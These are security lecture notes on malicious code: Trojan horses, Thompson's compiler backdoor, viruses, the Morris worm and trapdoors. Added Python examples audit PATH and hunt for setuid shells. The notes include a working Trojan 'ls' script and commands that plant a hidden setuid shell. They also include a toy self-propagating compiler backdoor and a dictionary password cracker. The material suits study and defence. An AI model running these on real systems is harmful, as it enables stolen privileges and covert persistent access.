Malicious Code
Kinds of Malicious Code
- Trojan horse
- Virus
- Logic bomb, time bomb
- Trapdoor, backdoor
- Worm
Trojan Horse
A Trojan horse is a piece of code that, in addition to its apparent primary effect, has a second, non-obvious malicious effect.
- The "ls" Trojan horse: a script named ls, planted in the attacker's directory, that does its damage and then runs the real ls so the victim sees nothing unusual.
- If somebody visits your directory, can you trick them into running a Trojan horse program? Yes, if "." comes before /bin in the victim's PATH environment variable: typing ls in that directory runs ./ls instead of /bin/ls, with the victim's privileges.
- Contents of the planted ./ls:

#!/bin/sh
cp /bin/sh /tmp/.xxsh      # copy a shell to a hidden file ...
chmod 4777 /tmp/.xxsh      # ... and make it setuid to the victim (4777 also leaves it world-writable)
rm ./ls                    # remove the evidence
ls "$@"                    # then do what the victim asked for; ./ls is gone, so this resolves to /bin/ls

- Caveat: the planted shell only yields the victim's privileges later if the setuid bit is honoured. bash resets its effective uid to the real uid unless started with -p, and a /tmp mounted nosuid ignores the bit entirely.
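The precondition for the attack above is a PATH that lets the current directory supply commands. The following is an added example, not part of the lecture notes: a Python audit of a PATH value that flags "." and empty components (which the shell also treats as the current directory), relative components, and world-writable directories that any local user could plant a program in. The function names and the constructed test values are this example's own.

```python
"""Audit a PATH value for the conditions that make the Trojan "ls" work.
Added example, not from the lecture notes; function names are this example's own."""
import os
import stat


def path_entries(path_value):
    """Split PATH the way the shell does. An empty component (a leading or
    trailing ':' or a '::') means the current directory, exactly like '.'."""
    return path_value.split(":")


def audit_path(path_value, check_fs=True):
    """Return a list of (entry, problem) pairs.
    cwd            '.' or an empty component: any directory the user cd's into
                   can supply a program named like a common command
    relative       resolved against the current directory, same exposure
    world-writable any local user can plant a program there; the sticky bit
                   does not help, since creating new files is still allowed
    Entries that do not exist are skipped; they cannot be abused until created."""
    problems = []
    for entry in path_entries(path_value):
        if entry in ("", "."):
            problems.append((entry or "<empty>", "cwd"))
        elif not entry.startswith("/"):
            problems.append((entry, "relative"))
        elif check_fs:
            try:
                st = os.stat(entry)
            except OSError:
                continue
            if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_IWOTH:
                problems.append((entry, "world-writable"))
    return problems


def cwd_before(path_value, real_dir="/bin"):
    """True if a cwd-style component precedes `real_dir`, so that a planted
    ./ls wins over /bin/ls. A cwd entry after /bin is still a problem for
    commands the victim mistypes or that are not installed."""
    entries = path_entries(path_value)
    cwd_positions = [i for i, e in enumerate(entries) if e in ("", ".")]
    if not cwd_positions:
        return False
    return real_dir not in entries or cwd_positions[0] < entries.index(real_dir)


def demo_world_writable():
    """Constructed case: a mode-1777 directory (like /tmp) placed on PATH."""
    import tempfile
    d = tempfile.mkdtemp()
    try:
        os.chmod(d, 0o1777)
        return [problem for _, problem in audit_path(d)]
    finally:
        os.rmdir(d)


if __name__ == "__main__":
    for entry, problem in audit_path(os.environ.get("PATH", "")):
        print(f"{problem:15} {entry}")
```

Run it without arguments to audit the current shell's PATH; the empty-component case is the one people miss, since a PATH built by concatenation (`PATH=$PATH:`) silently adds the current directory.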
Ken Thompson's Famous Trojan Horses
- "Reflections on Trusting Trust", Turing Award lecture.
- Goal: add a Trojan horse to the login program so that a special password logs into any account. The Trojan horse should be difficult to detect and fix.
- Approach 1: change the login binary. This is easy to fix: just recompile it from login.c.
- What about changing login.c as well? That is easy to detect if somebody reads the code. Q: how to make it more difficult to detect?
- Approach 2: change compiler.c so that, whenever the compiler compiles login.c, it automatically adds the Trojan horse to the login binary, and change login.c back to normal. login.c is now clean, but what if somebody reads compiler.c? The Trojan horse in compiler.c can be detected, and they can fetch another copy of compiler.c and compile this new (and clean) compiler.c.
- Approach 3: change compiler.c so that the compiler inserts the Trojan horse when it compiles login.c, and inserts this whole insertion mechanism (including the code that inserts it) when it compiles compiler.c. Build the compiler once from this modified source, then change compiler.c back to normal.
- The Trojan horse is now built into the compiler binary, and it re-inserts itself whenever a clean compiler.c is compiled with that binary.
- Unless somebody inspects the compiler binary, the Trojan horse is difficult to detect: none of the source files contain it; it is added by the compiler.
- To remove the Trojan horse, one has to replace the compiler binary with one built by a toolchain that was never infected; rebuilding the compiler with an independent compiler and comparing the outputs (diverse double-compiling) is the standard check.
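A toy model of approach 3, added here as an example and not the notes' or Thompson's own code: "source files" are Python strings, a "compiler" turns a source string into a namespace of callables, and the infected compiler both backdoors any login source it sees and writes its own insertion logic into any compiler source it sees. The insertion text has to contain itself (a quine), which is the part of the trick that makes it survive recompilation from clean sources. LOGIN_SRC, COMPILER_SRC, the trigger strings and the backdoor password "joshua" are all assumptions of this example.

```python
"""Toy model of Thompson's approach 3 (added example; not the notes' or Thompson's code).
'Source files' are Python strings, a 'compiler' turns a source string into a namespace,
and a 'binary' is the resulting callable. All names and the backdoor password are
assumptions made for this example."""

# Stand-ins for login.c and compiler.c. Both stay clean for the whole demo.
LOGIN_SRC = '''\
USERS = {"alice": "wonderland"}

def login(user, password):
    return USERS.get(user) == password
'''

COMPILER_SRC = '''\
def compile(src):
    ns = {}
    exec(src, ns)
    return ns
'''

# The insertion logic, written as a template that contains itself (a quine),
# because an infected compiler must be able to write this exact text into the
# next compiler it builds. %r is replaced by the template's own literal; %% is %.
TROJAN_TEMPLATE = '''\
# --- added by the infected compiler; present in no source file ---
TROJAN_TEMPLATE = %r
TROJAN_SRC = TROJAN_TEMPLATE %% TROJAN_TEMPLATE

def _trojan(src):
    if "def login(" in src:            # bug 1: backdoor the login program
        src = src.replace("return USERS.get(user) == password",
                          "return password == 'joshua' or USERS.get(user) == password")
    if "def compile(" in src and "_trojan" not in src:   # bug 2: infect new compilers
        src = TROJAN_SRC + src.replace("    ns = {}", "    src = _trojan(src)\\n    ns = {}")
    return src
'''
TROJAN_SRC = TROJAN_TEMPLATE % TROJAN_TEMPLATE


def clean_compile(src):
    """An independent, trusted toolchain (what a second, clean compiler gives you)."""
    ns = {}
    exec(src, ns)
    return ns


def payload_reproduces():
    """The quine property: running the payload rebuilds the payload text exactly."""
    ns = {}
    exec(TROJAN_SRC, ns)
    return ns["TROJAN_SRC"] == TROJAN_SRC


def bootstrap_infected_compiler():
    """Approach 3, step 1: temporarily add the Trojan horse to compiler.c, build it
    with a clean toolchain, then 'restore' compiler.c (COMPILER_SRC was never edited)."""
    attacker = {}
    exec(TROJAN_SRC, attacker)
    tainted_compiler_src = attacker["_trojan"](COMPILER_SRC)
    return clean_compile(tainted_compiler_src)["compile"]


def demo():
    infected = bootstrap_infected_compiler()
    rebuilt = infected(COMPILER_SRC)["compile"]        # generation 2, from clean compiler.c
    login_rebuilt = rebuilt(LOGIN_SRC)["login"]        # login built from clean login.c
    login_clean = clean_compile(LOGIN_SRC)["login"]
    return {
        "backdoor via infected compiler": infected(LOGIN_SRC)["login"]("nobody", "joshua"),
        "backdoor via rebuilt compiler": login_rebuilt("nobody", "joshua"),
        "normal login still works": login_rebuilt("alice", "wonderland"),
        "wrong password still rejected": login_rebuilt("alice", "guess"),
        "backdoor via clean toolchain": login_clean("nobody", "joshua"),
        "trojan text in login.c": "joshua" in LOGIN_SRC,
        "trojan text in compiler.c": "_trojan" in COMPILER_SRC,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:32} {v}")
```

The point of the demo is the "rebuilt" line: the second-generation compiler was built from the pristine COMPILER_SRC, yet the login it produces still accepts the backdoor password, while neither source string contains a trace of it. Only the independent toolchain yields a clean login.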
Virus
- A virus must be activated by being executed. There are various ways to get activated:
- Running an infected program
- Opening an e-mail attachment (Melissa, a Word macro virus; the Love Bug, a VBScript attachment)
- Merely viewing an e-mail message (the BubbleBoy virus ran from the message body when it was displayed, with no attachment)
- Appended viruses: the virus code is attached to the host program and the entry point is redirected to it
- Viruses that surround a program: run before and after the host, so they can also cover their tracks
- Boot sector viruses: run before the operating system is loaded
Solutions
- No general cure for viruses
- Virus checkers are effective against known viruses only: they match signatures, so a new or modified virus needs a new signature
Truths and Misconceptions about viruses
- Viruses can infect systems other than PCs/MS-DOS/Windows
- Q: why do not many viruses exist on Unix?
- Viruses can appear in data files: Microsoft Word macro viruses
Worms
- Difference from a virus: a worm propagates by itself over the network.
History of the Internet Worm
- Nov. 2, 1988, Robert T. Morris Jr.
- His father, Robert T. Morris Sr. (then at the NSA), and Ken Thompson had written a paper on password security in 1979.
- Flaw in the worm: its check for an already-running copy on the same machine was unreliable, so hosts were infected over and over and ground to a halt; that load, not any payload, is what made the worm noticeable and damaging.
What made the worm a successful attack:
- Bug in fingerd: a buffer overflow (gets() into a fixed-size stack buffer)
- Backdoor in sendmail: DEBUG mode, which let the sender supply commands in place of a recipient address
- Trusted-host remote execution (rsh/rexec via .rhosts and hosts.equiv), a mechanism meant to simplify resource sharing
- Weak passwords: password guessing against the world-readable hashed password file
- The worm carried a short list of 432 common passwords, e.g. "guest", "passwords", "aaa", "help", "coffee", "coke"
- If the short list failed, it used the system dictionary
- Disguise:
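The password-guessing stage above is simple to model, and doing so shows why ordering the guesses matters. The following is an added example, not the worm's code or the notes': a constructed password file, a stand-in hash (salted SHA-256 instead of the DES-based crypt(3) of 1988), and the three guessing stages in the order Spafford's analysis attributes to the worm: account-derived guesses, the built-in word list, then the system dictionary. The sample users, words and the hash choice are assumptions of this example.

```python
"""Model of the Morris worm's password attack (added, constructed example)."""
import hashlib


def hash_password(salt, password):
    """Salted SHA-256 stands in for the DES-based crypt(3) of 1988 (an assumption
    made for this example); the guessing strategy is the same either way."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed sample of a world-readable /etc/passwd: user -> (GECOS name, salt, hash)
SAMPLE_PASSWD = {
    "rtm":   ("Robert Morris", "a1", hash_password("a1", "rtm")),          # same as login name
    "alice": ("Alice Liddell", "b2", hash_password("b2", "coffee")),       # on the built-in list
    "bob":   ("Bob Smith",     "c3", hash_password("c3", "zebra")),        # only in the dictionary
    "carol": ("Carol Danvers", "d4", hash_password("d4", "Tr0ub4dor&3")),  # not guessable this way
}

# The notes quote a few of the worm's 432 built-in words; this is a short stand-in.
SHORT_LIST = ["guest", "passwords", "aaa", "help", "coffee", "coke", "root", "wizard"]
# Stand-in for the system dictionary (/usr/dict/words).
DICTIONARY = ["apple", "banana", "system", "unix", "zebra"]


def account_guesses(user, gecos):
    """Stage 1: no password, the login name, the name doubled, each part of the
    GECOS name, and the last name reversed. Cheap, and they hit surprisingly often."""
    first, _, last = gecos.partition(" ")
    raw = ["", user, user * 2, first, last, last[::-1], first.lower(), last.lower()]
    return list(dict.fromkeys(raw))          # de-duplicate, keep order


def guess_password(user, gecos, salt, digest):
    """Return (stage, password) or None. Each stage is more expensive than the
    last, so the cheap account-derived guesses go first."""
    stages = (("account", account_guesses(user, gecos)),
              ("short-list", SHORT_LIST),
              ("dictionary", DICTIONARY))
    for stage, words in stages:
        for word in words:
            if hash_password(salt, word) == digest:
                return stage, word
    return None


def crack_all(passwd):
    """Run the attack over a whole password file; None means the user survived."""
    return {user: guess_password(user, *entry) for user, entry in passwd.items()}


if __name__ == "__main__":
    for user, result in crack_all(SAMPLE_PASSWD).items():
        print(f"{user:6} {result}")
```

Everything the attack needs is offline: a readable hash file and CPU time. Shadowed password files, slow hashes and a rejection of dictionary words at password-change time each remove one of those ingredients.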
More Malicious Code: Code Red
- July 2001
- Targeted Microsoft's Internet Information Server (IIS)
- Spread by exploiting a buffer overflow in IIS, with no action by any user required
Trapdoors
- Another example: what is a fast way to gain somebody's full privileges permanently when they leave their logged-in terminal unattended for a short period? Two commands at their shell:

% cp /bin/sh /tmp/.xxsh
% chmod 4777 /tmp/.xxsh

- Running /tmp/.xxsh later gives the attacker a shell with the victim's uid, for as long as the file survives, /tmp is not mounted nosuid and the shell honours the setuid bit.
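The planted setuid shell is easy to hunt for, because it is a byte-for-byte copy of a system shell with the setuid bit set, whatever it is named. The following is an added example, not part of the notes: a Python scanner that walks a directory tree, reports every setuid/setgid regular file, and flags those whose SHA-256 matches a known shell. The demo builds a constructed tree with a fake "sh" standing in for /bin/sh; function names are this example's own.

```python
"""Hunt for the trapdoor in the notes: a setuid copy of a system shell.
Added example, not from the lecture notes."""
import hashlib
import os
import stat


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_setuid_files(root, known_shells):
    """Walk `root` and return sorted (path, verdict) pairs for every regular file
    with the setuid or setgid bit set. `known_shells` maps sha256 -> shell name;
    a setuid file whose content matches one is a planted shell like .xxsh, whatever
    it is called. Symlinks are not followed (lstat), so they cannot mislead the scan."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                continue
            shell = known_shells.get(sha256_file(p))
            if shell:
                verdict = f"setuid copy of {shell}"
            elif st.st_mode & stat.S_IWOTH:
                verdict = "setuid and world-writable"
            else:
                verdict = "setuid"
            hits.append((p, verdict))
    return sorted(hits)


def system_shell_digests(candidates=("/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/zsh")):
    """Digests of the shells actually installed here, to feed find_setuid_files."""
    return {sha256_file(p): p for p in candidates if os.path.isfile(p)}


def demo():
    """Constructed scenario: a fake 'sh' stands in for /bin/sh; a setuid copy of it is
    planted under a dot-name (the notes' trapdoor), next to a benign file and an
    unrelated setuid program. Returns (basename, verdict) pairs."""
    import shutil
    import tempfile
    root = tempfile.mkdtemp()
    try:
        fake_sh = os.path.join(root, "sh")
        with open(fake_sh, "wb") as f:
            f.write(b"#!/bin/sh\n# stand-in for /bin/sh\n")
        planted = os.path.join(root, ".xxsh")
        shutil.copy(fake_sh, planted)
        os.chmod(planted, 0o4777)                    # cp /bin/sh ...; chmod 4777 ...
        other = os.path.join(root, "tool")
        with open(other, "wb") as f:
            f.write(b"#!/bin/sh\necho tool\n")
        os.chmod(other, 0o4755)                      # setuid, but not a shell copy
        with open(os.path.join(root, "notes.txt"), "w") as f:
            f.write("benign\n")
        hits = find_setuid_files(root, {sha256_file(fake_sh): "/bin/sh"})
        return [(os.path.basename(p), v) for p, v in hits]
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for path, verdict in find_setuid_files("/tmp", system_shell_digests()):
        print(f"{verdict:28} {path}")
```

On a real system run it over /tmp, /var/tmp and home directories with `system_shell_digests()`; a setuid file in any world-writable location is suspicious even when its content matches nothing, which is why the scanner reports those too.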
Causes of trapdoors:
- Forgotten: left in by mistake
- Intentionally left in the program for testing
- Intentionally left in for maintenance
- Intentionally left in as a covert means of access to the component
Wenliang Du, Malicious Code, 8/8/2018